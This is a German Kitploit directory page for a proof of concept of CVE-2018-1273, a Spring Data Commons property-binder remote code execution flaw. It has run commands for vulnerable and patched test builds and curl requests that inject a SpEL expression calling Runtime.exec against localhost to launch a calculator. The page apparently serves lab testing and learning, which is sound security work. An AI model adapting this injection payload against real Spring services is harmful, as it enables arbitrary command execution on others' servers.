Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-1273 — PoC für CVE-2018-1273: Spring Data Commons property binder RCE via manipulierte Anfrageparameter gegen REST-Endpunkte. Enthält anfällige und korrigierte Versionen zum Testen. | Kitploit
Tools/GitHubGitHub/hdgokani/cve-2018-1273
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubhdgokani/cve-2018-1273

CVE-2018-1273

PoC für CVE-2018-1273: Spring Data Commons property binder RCE via manipulierte Anfrageparameter gegen REST-Endpunkte. Enthält anfällige und korrigierte Versionen zum Testen.

Repository anzeigen
vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-1273

Spring Data Commons, Versionen vor 1.13 bis 1.13.10, 2.0 bis 2.0.5 sowie ältere nicht unterstützte Versionen, enthalten eine Property-Binder-Schwachstelle, die durch unsachgemäße Neutralisierung spezieller Elemente verursacht wird. Ein nicht authentifizierter entfernter Angreifer kann speziell gestaltete Anfrageparameter gegen Spring Data REST-gestützte HTTP-Ressourcen liefern oder die projektionsbasierte Anforderungsnutzlastbindung von Spring Data verwenden, was zu einer Remote-Codeausführung führen kann.

Weitere Informationen hier

Ausführung

Die Anwendung kann mit der angreifbaren Version oder der korrigierten Version von Spring Data Commons getestet werden.

  • Angreifbare Version (Standard):
root@kitploit:~
mvn spring-boot:run
  • Korrigierte Version:
root@kitploit:~
mvn spring-boot:run -Dfixed

Testen der Schwachstelle

Führen Sie den folgenden Befehl aus, um zu prüfen, ob die Schwachstelle ausgenutzt werden kann:

  • Unter Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • Unter MacOs:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Credits

Erstellt von https://www.arima.eu

ARIMA Software Design

Tool herunterladen